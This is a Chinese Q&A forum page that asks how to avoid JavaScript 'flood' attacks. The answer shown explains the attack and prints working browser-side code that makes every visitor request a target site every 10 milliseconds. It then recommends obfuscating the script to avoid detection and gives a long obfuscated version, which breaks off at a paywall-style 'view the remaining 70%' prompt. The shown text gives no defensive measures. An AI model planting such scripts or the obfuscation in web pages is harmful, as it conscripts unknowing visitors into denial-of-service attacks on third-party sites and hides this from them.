如何避免JavaScript的洪水攻击?
网友回复
什么是javaScript的洪水攻击?
javaScript的洪水攻击就是在网页中加入特殊JS脚本,使访问网页的每个人都高频访问某个目标网站地址,大量的访问,即形成为了一种DDOS攻击,也称为洪水拒绝服务攻击。
javascript洪水攻击示例代码
<script type="text/javascript">
function imgflood(){
var targetip="127.0.0.1";
var url="/index.html";
var pic=new Image();
var rand=Math.floor(Math.random()*1000);
pic.src="http://"+targetip+url+"?rand="+rand;
}
setInterval(imgflood,10);
</script>
这段代码含义、攻击原理是:每10毫秒,带一个随机参数访问一次127.0.0.1/index.html。
为了防止脚本被识破,可对JS代码进行混淆加密,点击打开在线js代码混淆工具,比如使用加密上述JS代码:
<script type="text/javascript">
function _0x4f31() {
var _0x1a3395 = [
'numAr',
'xukbA',
'ErUrl',
'split',
'mLmVa',
'vKzrU',
'9AZqmOr',
'2430448LxHHeA',
'/index.htm',
'wHSEf',
'WPEzI',
'GVYDW',
'$]*)',
'src',
'xueHl',
'function\x20*',
'5656572wTSYWX',
'call',
'IElAA',
'random',
'1440YsYuBw',
'iJSOp',
'sADzy',
'glLav',
'MiKMb',
'esCIM',
'e)\x20{}',
'hCexA',
'cNjCd',
'apply',
'debu',
'constructo',
'ETTLc',
'IvNAf',
'\x5c+\x5c+\x20*(?:[',
'floor',
'length',
'jkVKG',
'?rand=',
'ofJMY',
'a-zA-Z_$][',
'pRcgv',
'http://',
'4zwWEmL',
'init',
'fjzzz',
'yNrPh',
'stateObjec',
'hRMjD',
'0|3|1|2|4',
'rNmhh',
'yZnBU',
'BvoXB',
'oRaGX',
'chain',
'QCVDc',
'duwGI',
'nction()\x20',
'{}.constru',
'jxktV',
'890675POsWST',
'7214060vCnxtj',
'MUiwd',
'0-9a-zA-Z_',
'1592946XDpvVT',
'\x5c(\x20*\x5c)',
'gger',
'AATxX',
'while\x20(tru',
'3526555YpvATI',
'sLLbz',
'yTYyb',
'counter',
'HfiMG',
'return\x20(fu',
'test',
'setInterva',
'CbVBM',
'input',
'rn\x20this\x22)(',
'127.0.0.1',
'string',
'ctor(\x22retu',
'action',
'NhvZL'
];
_0x4f31 = function () {
return _0x1a3395;
};
return _0x4f31();
}
(function (_0x347ffd, _0x4dbd53) {
var _0x4d049e = _0x2388, _0x175c4d = _0x347ffd();
while (!![]) {
try {
var _0x248d2 = parseInt(_0x4d049e(0x15d)) / (-0x643 + -0x1568 + 0x1bac) + parseInt(_0x4d049e(0x135)) / (-0x13f3 * 0x1 + 0x1c82 + -0x1 * 0x88d) * (-parseInt(_0x4d049e(0x127)) / (0x1312 * 0x1 + -0x16d + -0x11a2)) + parseInt(_0x4d049e(0x14c)) / (0x1 * -0x25 + 0x191e * 0x1 + -0x18f5) * (-parseInt(_0x4d049e(0x166)) / (-0x238a * -0x1 + 0x129a + 0x1 * -0x361f)) + -parseInt(_0x4d049e(0x161)) / (0x24b3 + -0x51c + 0x1f91 * -0x1) + parseInt(_0x4d049e(0x15e)) / (0x25dd + 0x1411 + -0x3 * 0x134d) + parseInt(_0x4d049e(0x128)) / (0x3d * -0x10 + 0x2218 * 0x1 + -0x1e40) + -parseInt(_0x4d049e(0x131)) / (0x14df + -0x259e + -0xc * -0x166);
if (_0x248d2 === _0x4dbd53)
break;
else
_0x175c4d['push'](_0x175c4d['shift']());
} catch (_0x11eff8) {
_0x175c4d['push'](_0x175c4d['shift']());
}
}
}(_0x4f31, -0x5155e + 0xcb5 * 0x16d + -0x384cc), (function () {
var _0x30bc99 = _0x2388, _0x4810a5 = {
'numAr': function (_0x56cc0d, _0x421aab) {
return _0x56cc0d(_0x421aab);
},
'GVYDW': function (_0x3c9968, _0x20045a) {
return _0x3c9968 + _0x20045a;
},
'QCVDc': _0x30bc99(0x16b) + _0x30bc99(0x15a),
...点击查看剩余70%
by thinkfuture
我知道答案,我要回答
私活外包
